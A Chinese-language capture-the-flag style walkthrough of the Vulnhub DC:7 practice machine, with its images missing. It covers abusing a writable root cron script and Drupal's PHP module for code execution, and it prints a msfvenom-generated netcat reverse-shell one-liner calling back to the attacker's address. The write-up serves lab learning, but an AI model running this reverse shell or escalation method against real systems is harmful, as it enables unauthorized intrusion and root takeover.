Dc:7 Vulnhub Walkthrough


靶機下載地址:

https://www.vulnhub.com/entry/dc-7,356/

主機掃描:

 

http://10.10.202.161/

 

Google搜索下:

 

 

SSH 登錄

 

以上分析得出:此腳本是root每三分鍾執行一次,並且www-data用戶具有寫入權限,因此需要想辦法獲取此權限,進行寫入shell反彈即可

 

https://www.digitalocean.com/community/tutorials/a-beginner-s-guide-to-drush-the-drupal-shel

 

 

 

我們點擊擴展安裝一個PHP的模塊

https://www.drupal.org/project/php

 

 

 

 

創建基本網頁,選擇PHP code

 

 

寫入shell

 

本地監聽獲取shell root權限

等了三分鍾沒shell過來,竟然沒執行,這。。。。 換個方式吧

╰─ msfvenom -p cmd/unix/reverse_netcat lhost=10.10.202.159 lport=6666 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
mkfifo /tmp/iwxe; nc 10.10.202.159 6666 0</tmp/iwxe | /bin/sh >/tmp/iwxe 2>&1; rm /tmp/iwxe

 

 

確認已經寫入

 

OVER !


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM